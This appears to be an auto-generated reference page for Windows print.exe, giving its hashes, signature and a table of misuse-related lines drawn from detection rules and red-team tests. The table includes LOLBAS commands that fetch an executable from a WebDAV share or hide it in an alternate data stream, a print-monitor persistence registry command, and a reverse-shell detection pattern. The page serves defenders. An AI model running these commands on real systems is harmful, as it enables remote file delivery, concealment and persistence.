print.exe

  • File Path: C:\Windows\system32\print.exe
  • Description: Print Utility

Hashes

Type Hash
MD5 63E11431499B9603D21BA075543CD415
SHA1 38FC357A66EF90D84FA07509DFD9071B54EB345D
SHA256 388D6761E678C66EEDA7085A05E10B13ABF88F855B753300C0F9B0D94DDB4DB0
SHA384 48540D170C7BB0ACEA8A706705AC77492886CAA3391D09545E585ECFA3E7A0491DBDA215778C9F9C2F6FE43B6C13BE42
SHA512 997F4CD774102FC867A7BD4C5851C13E6C160323937A31EF7678234F47EFA19E9AF492D13A37E294DF20144F8DAE6A7A7D62E0134CF0E2536FADFCCC5A4453A6
SSDEEP 192:Ks0CHkYa05foZiaDsqBNCh7MtKd+46Pv+DxlzezB/HQYjkGpnX4dhiJmVWzUW:vXbjaNNtkdU6xBezB/UQnXCVWzUW
IMP D67C73847BD1DC0D9109BA544AD6C11D
PESHA1 50A77BD35AC84ECAC14CC2E25B7735F9BB89A11D
PE256 98FD7307A07AD66A5718C153284BEF7A46CED530C146EEE728D61402540AE49C

Runtime Data

Usage (stdout):

Prints a text file.

PRINT [/D:device] [[drive:][path]filename[...]]

   /D:device   Specifies a print device.


Loaded Modules:

Path
C:\Windows\System32\KERNEL32.DLL
C:\Windows\System32\KERNELBASE.dll
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\system32\print.exe

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: Print.Exe.MUI
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/75
  • VirusTotal Link: https://www.virustotal.com/gui/file/388d6761e678c66eeda7085a05e10b13abf88f855b753300c0f9b0d94ddb4db0/detection

Possible Misuse

The following table contains possible examples of print.exe being misused. While print.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma av_printernightmare_cve_2021_34527.yml description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 . DRL 1.0
sigma lnx_shell_susp_rev_shells.yml - ';while(cmd=c.gets);IO.popen(cmd,"r"){\|io\|c.print' DRL 1.0
sigma zeek_dce_rpc_printnightmare_print_driver_install.yml title: Possible PrintNightmare Print Driver Install DRL 1.0
sigma zeek_dce_rpc_printnightmare_print_driver_install.yml Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). DRL 1.0
sigma zeek_dce_rpc_printnightmare_print_driver_install.yml The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy. DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler.yml title: Possible CVE-2021-1675 Print Spooler Exploitation DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler.yml description: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675 DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler.yml - 'The print spooler failed to load a plug-in module' DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler_operational.yml title: CVE-2021-1675 Print Spooler Exploitation DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler_operational.yml description: Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler_security.yml title: CVE-2021-1675 Print Spooler Exploitation IPC Access DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler_security.yml description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527 DRL 1.0
sigma file_event_win_cve_2021_1675_printspooler.yml title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern DRL 1.0
sigma file_event_win_cve_2021_1675_printspooler.yml description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675 DRL 1.0
sigma proc_creation_win_susp_print.yml title: Abusing Print Executable DRL 1.0
sigma proc_creation_win_susp_print.yml description: Attackers can use print.exe for remote file copy DRL 1.0
sigma proc_creation_win_susp_print.yml - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Print.yml DRL 1.0
sigma proc_creation_win_susp_print.yml - \print.exe DRL 1.0
sigma proc_creation_win_susp_print.yml - print DRL 1.0
sigma proc_creation_win_susp_print.yml - print.exe DRL 1.0
sigma proc_creation_win_susp_spoolsv_child_processes.yml description: Detects suspicious print spool service (spoolsv.exe) child processes. DRL 1.0
sigma proc_creation_win_susp_spoolsv_child_processes.yml - https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md DRL 1.0
sigma registry_event_add_port_monitor.yml TargetObject\|startswith: 'HKLM\System\CurrentControlSet\Control\Print\Monitors\' DRL 1.0
sigma registry_event_add_port_monitor.yml TargetObject\|contains: '\System\CurrentControlSet\Control\Print\Monitors\CutePDF Writer Monitor v4.0\Driver' DRL 1.0
sigma registry_event_asep_reg_keys_modification.yml - '\Print\Providers' DRL 1.0
sigma registry_event_asep_reg_keys_modification.yml - '\Print\Monitors' DRL 1.0
sigma registry_event_asep_reg_keys_modification_currentcontrolset.yml - '\Print\Providers' DRL 1.0
sigma registry_event_asep_reg_keys_modification_currentcontrolset.yml - '\Print\Monitors' DRL 1.0
sigma registry_event_asep_reg_keys_modification_currentcontrolset.yml TargetObject\|contains: '\Print\Monitors\CutePDF Writer Monitor' DRL 1.0
sigma registry_event_mimikatz_printernightmare.yml - '\Control\Print\Environments\Windows x64\Drivers\Version-3\QMS 810\' DRL 1.0
sigma registry_event_mimikatz_printernightmare.yml - '\Control\Print\Environments\Windows x64\Drivers\Version-3\mimikatz' DRL 1.0
sigma registry_event_mimikatz_printernightmare.yml - '\Control\Print\Environments\Windows' DRL 1.0
sigma registry_event_mimikatz_printernightmare.yml - '\Control\Print\Environments' DRL 1.0
sigma registry_event_mimikatz_printernightmare.yml - '\CurrentVersion\Print\Printers' DRL 1.0
sigma registry_event_susp_printer_driver.yml - '\Control\Print\Environments\Windows x64\Drivers' DRL 1.0
LOLBAS Print.yml Name: Print.exe  
LOLBAS Print.yml - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe  
LOLBAS Print.yml - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe  
LOLBAS Print.yml - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe  
LOLBAS Print.yml - Path: C:\Windows\System32\print.exe  
LOLBAS Print.yml - Path: C:\Windows\SysWOW64\print.exe  
LOLBAS Print.yml - IOC: Print.exe retrieving files from internet  
LOLBAS Print.yml - IOC: Print.exe creating executable files on disk  
LOLBAS Mshtml.yml Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box).  
malware-ioc deprimon https://www.welivesecurity.com/2019/11/21/deprimon-default-print-monitor-malicious-downloader/[WeLiveSecurity]. © ESET 2014-2018
malware-ioc deprimon [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Windows Default Print Monitor] © ESET 2014-2018
malware-ioc nouns.txt print © ESET 2014-2018
malware-ioc mumblehard under the Perl interpreter. The following command ran as root will print the © ESET 2014-2018
malware-ioc mumblehard ps -ef \| grep -e ' httpd$' -e ' mail$' -e ' init$' \| awk '{print $2}' \| xargs -I '{}' ls -l '/proc/{}/exe' \| grep perl \| cut -d/ -f 3 © ESET 2014-2018
malware-ioc 2020_Q4 HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\BcastDVRUserService_6d67d\Driver © ESET 2014-2018
malware-ioc 2020_Q4 HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\BcastDVRUserService_3c628o\Driver © ESET 2014-2018
malware-ioc 2020_Q4 HKLM\SOFTWARE\Microsoft\Print\Components\Spooler-PPC\{94E5H6D48A-P895-85E1-54DD-080636B11A03} © ESET 2014-2018
malware-ioc 2020_Q4 HKLM\SOFTWARE\Microsoft\Print\Components\Spooler-PPC\{38C8D238Q-923C-D782-9B8J-829263CD85C9} © ESET 2014-2018
malware-ioc vf_ioc_linux_rakos.py print("Suspected PID: {0:8s} {1:<16}:{2:>5} {3:<16}:{4:>5} {5:<15s} {6:>17s}/{7:<5d}\n".format(proto, saddr, sport, daddr, dport, state, task.comm, task.pid)) © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_str_ : "; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "$f : crypted, skip\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print $fc. "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_ssh: \n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd1: '$sd[1]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc1: '$sc[1]':'$sc[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd1a: file:'$sd[4]'; hash:'$sd[15]'; cvs:'$sd[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd2: '$sd[1]':'$sd[2]':'$sd[3]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc4: '$sc[1]':'$sc[0]'\n" if @sc and f $sc[1]; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd4: '$sd[0]':'$sd[1]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd5: " . join( '\|', @sd ) . "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd6: '$sd[2]':'$sd[0]'\nmod_sshc6: '$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd7: '$sd[0]':'$sd[4]'\nmod_sshc7: '$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd8: '$sd[1]':'$sd[2]'\nmod_sshc8: '$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print © ESET 2014-2018
malware-ioc windigo_signatures.pl if (@sd) { print "mod_sshd12: GET, no params"; ssh_ls() } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd14: hash:'$sd[3]':'$sd[4]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc14: hash:'$sd[3]':'$sd[4]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl else { print "mod_sshd14: unknown hash; fpass:'$sd[1]';'$sd[3]'\n" } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod14p: $d\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd15: '$sd[0]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc15: '$sc[38]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd16: '$sd[0]':'$sd[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc16: '$sc[1]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd17: crypt:'$sd[2]':'$sd[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc17: '$sc[0]':'$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd17: client_string:'$q[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd18: md5:'$sd[3]':'$sd[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc18: md5:'$sc[3]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd19: '$sd[0]':'$sd[1]' url:'$sd[5] '$sd[4]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd20: '$sd[0]':'$sd[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc20: '$sc[0]':'$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd21: '$sd[0]' mod_sshc21: '$sc[0]':'$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc22: '$sd[0]':'$sd[1]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd23: '$sd[2]':'$sd[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc23: '$sc[0]':'$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd24: '$sd[0]':'$sd[17]':'$sd[18]:$sd[20]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc24: '$sc[1]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd25: '$sd[2]':'$sd[0]' mod_sshc25: '$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd27: '$sd[0]':'$sd[2]':'$sd[1]'\nmod_sshc27: '$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd31: hash:'$sd[2]':'$sd[1]':'$sd[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd32: md5:'$sd1[0]:'$sd[0]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd33: '$sd[0]':'$sd[1]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print $q. "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd36: md5:'$sd[0]':'$sc[0]'; '$sd[1]':'$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd37: md5:'$sd[0]'; '$sd[1]':'$sd[3]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl while (<$fn>) { chomp; print $_ ^ "\x14" x length $_ } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_ssh41_cstr: " . join( '\|', sort keys %ostr ) . "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd41: '$sd[1]' '$sd[0]', crypted\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc41: '$sc[1]' '$sc[0]', crypted\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd42: detected; log_useragent:passwd_file:passwd\n" if @sd; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc42: detected\n" if @sc; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd44: pass:'$sd[1]' '$sd[0]', '$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl if ( $sc[0] ) { print "mod_sshc44: '$sc[0]' '$sc[13]'\n"; ssh_ls( $sd[0] ) } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd45: pass:'$sd[1]' host:'$sd[0]', '$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl if ( $sc[0] ) { print "mod_sshc45: host:'$sc[0]' '$sc[1]'\n"; ssh_ls() } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd46: crypt:'$sc[1]' v1:'$sd[1]' v2:'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd47: pass:'$sd[0]' '$sd[1]', '$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl if (@sc) { print "mod_sshc47: host:'$sc[0]' '$sc[-1]'\n"; ssh_ls( $sc[0] ) } © ESET 2014-2018
malware-ioc windigo_signatures.pl for (@sd) { print "mod_md5_sshd: '$_'\n" } © ESET 2014-2018
malware-ioc windigo_signatures.pl for (@sc) { print "mod_md5_ssh: '$_'\n" } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_md5_static_ssl: $static_ssl\n" if $static_ssl; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_hack_strd: possible hacked, " . join( "\|", @sd ) . "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_hack_strc: possible hacked, " . join( "\|", @sc ) . "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl for (@sd) { print "mod_md5_sshd1: '$_'\n" } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_str_sshd_str: '" . join( "':'", keys %ostr ) . "'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_str_sshd_str1: '" . join( "':'", keys %ostr ) . "'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl if (@sd) { print "sshd_str: " . join( '\|', @sd ) . "\n" } © ESET 2014-2018
malware-ioc windigo_signatures.pl if (@sc) { print "sshc_str: " . join( '\|', @sc ) . "\n" } © ESET 2014-2018
malware-ioc turla ** ResultQueue::print``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc turla ** TaskQueue::print``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc windigo print the dynamic section of the ELF header. Anything NEEDED (type 1) other © ESET 2014-2018
malware-ioc windigo OpenSSH version 6.7 or earlier. A clean server will print © ESET 2014-2018
malware-ioc windigo to stderr but an infected server will only print the usage (note the missing © ESET 2014-2018
malware-ioc windigo yields no output if one is not infected and would print a filename if one is. © ESET 2014-2018
malware-ioc windigo ps -ef \| grep crond \| grep -v grep \| awk '{print $2}' © ESET 2014-2018
malware-ioc winnti_group HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\PrintFiiterPipelineSvc\Driver = DEment.dll © ESET 2014-2018
malware-ioc winnti_group HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\lltdsvc1\Driver = EntAppsvc.dll © ESET 2014-2018
malware-ioc winnti_group HKLM\SOFTWARE\Microsoft\Print\Components\DC20FD7E-4B1B-4B88-8172-61F0BED7D9E8 © ESET 2014-2018
malware-ioc winnti_group HKLM\SOFTWARE\Microsoft\Print\Components\A66F35-4164-45FF-9CB4-69ACAA10E52D © ESET 2014-2018
atomic-red-team index.md - T1547.012 Print Processors CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1547.012 Print Processors CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Outlook Forms CONTRIBUTE A TEST | Print Processors CONTRIBUTE A TEST | Impair Defenses CONTRIBUTE A TEST | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Print Processors CONTRIBUTE A TEST | Services File Permissions Weakness CONTRIBUTE A TEST | Masquerade Task or Service | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Password Filter DLL | Print Processors CONTRIBUTE A TEST | Indicator Removal from Tools CONTRIBUTE A TEST | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Print Processors CONTRIBUTE A TEST | Security Support Provider | Mark-of-the-Web Bypass | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team T1016.md if [ -x “$(command -v netstat)” ]; then netstat -ant | awk ‘{print $NF}’ | grep -v ‘[a-z]’ | sort | uniq -c; else echo “netstat is missing from the machine. skipping…”; fi; MIT License. © 2018 Red Canary
atomic-red-team T1018.md Upon successful execution, cmd.exe will execute net.exe view and display results of local systems on the network that have file and print sharing enabled. MIT License. © 2018 Red Canary
atomic-red-team T1018.md adidnsdump -u #{user_name} -p #{acct_pass} –print-zones #{host_name} MIT License. © 2018 Red Canary
atomic-red-team T1027.004.md Upon execution, the exe will print ‘T1027.004 Dynamic Compile’. MIT License. © 2018 Red Canary
atomic-red-team T1036.006.md 1. echo ‘#!/bin/bash\necho “print "hello, world!"” | /usr/bin/python\nexit’ > execute.txt && chmod +x execute.txt MIT License. © 2018 Red Canary
atomic-red-team T1059.003.md - Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing MIT License. © 2018 Red Canary
atomic-red-team T1059.003.md ## Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing MIT License. © 2018 Red Canary
atomic-red-team T1059.003.md It is designed to mimic BlackByte ransomware’s print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. MIT License. © 2018 Red Canary
atomic-red-team T1059.003.md | max_to_print | The maximum number of Wordpad windows the test will open/print. | String | 75| MIT License. © 2018 Red Canary
atomic-red-team T1059.003.md ##### Description: File to print must exist on disk at specified location (#{file_to_print}) MIT License. © 2018 Red Canary
atomic-red-team T1082.md in order simply print the recon results to the screen as opposed to exfiltrating them. Script. MIT License. © 2018 Red Canary
atomic-red-team T1083.md cd $HOME && find . -print | sed -e ‘s;[^/]*/;|;g;s;|; |;g’ > #{output_file} MIT License. © 2018 Red Canary
atomic-red-team T1110.003.md This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like “[*] username:password”, whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray. MIT License. © 2018 Red Canary
atomic-red-team T1127.001.md Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print “Hello From a Code Fragment” and “Hello From a Class.” to the screen. MIT License. © 2018 Red Canary
atomic-red-team T1127.001.md Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print “Hello from a Visual Basic inline task!” to the screen. MIT License. © 2018 Red Canary
atomic-red-team T1140.md | message | Message to print to the screen | String | Hello from Atomic Red Team test T1140!| MIT License. © 2018 Red Canary
atomic-red-team T1140.md ENCODED=$(python3 -c ‘import base64;enc=base64.b64encode(“#{message}”.encode());print(enc.decode())’) MIT License. © 2018 Red Canary
atomic-red-team T1140.md python3 -c “import base64;dec=base64.b64decode("$ENCODED");print(dec.decode())” MIT License. © 2018 Red Canary
atomic-red-team T1140.md python3 -c “import base64 as d;dec=d.b64decode("$ENCODED");print(dec.decode())” MIT License. © 2018 Red Canary
atomic-red-team T1140.md python3 -c “from base64 import b64decode;dec=b64decode("$ENCODED");print(dec.decode())” MIT License. © 2018 Red Canary
atomic-red-team T1140.md python3 -c “from base64 import b64decode as d;dec=d("$ENCODED");print(dec.decode())” MIT License. © 2018 Red Canary
atomic-red-team T1140.md echo $ENCODED | python3 -c “import base64,sys;dec=base64.b64decode(sys.stdin.read());print(dec.decode())” MIT License. © 2018 Red Canary
atomic-red-team T1140.md echo $ENCODED > #{encoded_file} && python3 -c “import base64;dec=base64.b64decode(open(‘#{encoded_file}’).read());print(dec.decode())” MIT License. © 2018 Red Canary
atomic-red-team T1140.md ENCODED=$(perl -e “use MIME::Base64;print(encode_base64(‘#{message}’));”) MIT License. © 2018 Red Canary
atomic-red-team T1140.md perl -le “use MIME::Base64;print(decode_base64(‘$ENCODED’));” MIT License. © 2018 Red Canary
atomic-red-team T1140.md echo $ENCODED | perl -le ‘use MIME::Base64;print(decode_base64());' MIT License. © 2018 Red Canary
atomic-red-team T1140.md echo $ENCODED > #{encoded_file} && perl -le ‘use MIME::Base64;open($f,”<”,”#{encoded_file}”);print(decode_base64(<$f>));’ MIT License. © 2018 Red Canary
atomic-red-team T1485.md dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk ‘{print $5}’) iflag=count_bytes MIT License. © 2018 Red Canary
atomic-red-team T1489.md Stops a specified service using the net.exe command. Upon execution, if the service was running “The Print Spooler service was stopped successfully.” MIT License. © 2018 Red Canary
atomic-red-team T1489.md will be displayed. If the service was not running, “The Print Spooler service is not started.” will be displayed and it can be MIT License. © 2018 Red Canary
atomic-red-team T1518.md /usr/libexec/PlistBuddy -c “print :CFBundleShortVersionString” /Applications/Safari.app/Contents/Info.plist MIT License. © 2018 Red Canary
atomic-red-team T1518.md /usr/libexec/PlistBuddy -c “print :CFBundleVersion” /Applications/Safari.app/Contents/Info.plist MIT License. © 2018 Red Canary
atomic-red-team T1546.001.md * HKEY_CLASSES_ROOT\txtfile\shell\print\command MIT License. © 2018 Red Canary
atomic-red-team T1547.010.md <blockquote>Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. MIT License. © 2018 Red Canary
atomic-red-team T1547.010.md reg add “hklm\system\currentcontrolset\control\print\monitors\ART” /v “Atomic Red Team” /d “#{monitor_dll}” /t REG_SZ MIT License. © 2018 Red Canary
atomic-red-team T1547.010.md reg delete “hklm\system\currentcontrolset\control\print\monitors\ART” /f >nul 2>&1 MIT License. © 2018 Red Canary
atomic-red-team T1562.004.md Print the last 10 lines of the Uncomplicated Firewall (UFW) log file MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe MIT License. © 2018 Red Canary
signature-base apt_backdoor_ssh_python.yar $s1 = “print ‘[-] (Failed to load moduli – gex will be unsupported.)’” fullword ascii CC BY-NC 4.0
signature-base apt_backdoor_ssh_python.yar $s2 = “print ‘[-] Listen/bind/accept failed: ‘ + str(e)” fullword ascii CC BY-NC 4.0
signature-base apt_backdoor_ssh_python.yar $s4 = “print ‘[-] SSH negotiation failed.’” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $x2 = “print "Gimme hex: ";” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s3 = “print "$hex in decimal=$dec\n\n";” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s2 = “print "ERROR: the filename or hex representation needs to be one argument try using \"’s\n";” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s5 = “print hextoIP($ARGV[0]);” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s2 = “print »out, "%s%04x " % (lead,i),” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s3 = “print »out, "%02X" % ord(x[i+j]),” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s4 = “print »out, sane(x[i:i+16])” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s1 = “print "[+] Connecting to %s:%s" % (self.params.dst[‘ip’], self.params.dst[‘port’])” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s6 = “print "[-] keyboard interrupt before response received"” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s8 = “print ‘Debug info ‘,’=’*40” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp_apr17.yar $s2 = “print "java -jar jscanner.jar$scanth$list\n";” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp_apr17.yar $x1 = “print ‘ -s storebin use storebin as the Store executable\n’” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp_apr17.yar $x3 = “print ‘ -k keyfile the key text file to inject’” fullword ascii CC BY-NC 4.0
signature-base apt_op_wocao.yar $a = “out.print("All seems fine.");” CC BY-NC 4.0
signature-base apt_op_wocao.yar $e = “out.print((char)c);}in.close()” CC BY-NC 4.0
signature-base apt_op_wocao.yar $f = “out.print((char)c);}er.close()” CC BY-NC 4.0
signature-base apt_project_sauron_extras.yar $s2 = “Print only replying Ips” CC BY-NC 4.0
signature-base apt_pulsesecure.yar $s3 = /if[\x09\x20]{0,32}(CGI::param([\x22\x27]\w{1,64}[\x22\x27]))\s{0,128}{[\x09\x20]{0,32}print [\x22\x27]Cache-Control: no-cache\n[\x22\x27][\x09\x20]{0,32};\s{0,128}print [\x22\x27]Content-type: text\/html\n\n[\x22\x27][\x09\x20]{0,32};\s{0,128}my $\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}CGI::param([\x22\x27]\w{1,64}[\x22\x27])[\x09\x20]{0,32};\s{0,128}system([\x22\x27]$/ CC BY-NC 4.0
signature-base apt_pulsesecure.yar $s4 = /sed -i [^\r\n]{1,128}CGI::param([^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Cache-Control: no-cache[^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Content-type: text\/html[^\r\n]{1,128}my [^\r\n]{1,128}=[\x09\x20]{0,32}CGI::param([^\r\n]{1,128}system(/ CC BY-NC 4.0
signature-base apt_pulsesecure.yar $r3 = /if[\x09\x20]{0,32}($\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27]\w{1,64}[\x22\x27])\s{0,128}{\s{1,128}print[\x09\x20]{0,32}[\x22\x27]Content-type/ CC BY-NC 4.0
